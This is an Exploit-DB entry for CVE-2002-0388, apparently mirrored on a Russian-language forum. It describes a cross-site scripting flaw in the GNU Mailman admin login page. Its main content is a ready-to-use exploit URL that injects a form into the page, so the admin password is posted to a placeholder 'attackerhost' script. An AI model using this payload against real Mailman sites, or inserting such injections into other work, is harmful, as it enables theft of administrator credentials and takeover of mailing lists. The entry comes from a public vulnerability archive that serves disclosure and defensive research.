- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21480
- Проверка EDB
-
- Пройдено
- Автор
- OFFICE
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2002-0388
- Дата публикации
- 2002-05-20
Код:
source: https://www.securityfocus.com/bid/4825/info
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
http://target/mailman_directory/admin/ml-name?adminpw="></form><form/action="http://attackerhost/attackerscript.cgi"/method="post"><br
- Источник
- www.exploit-db.com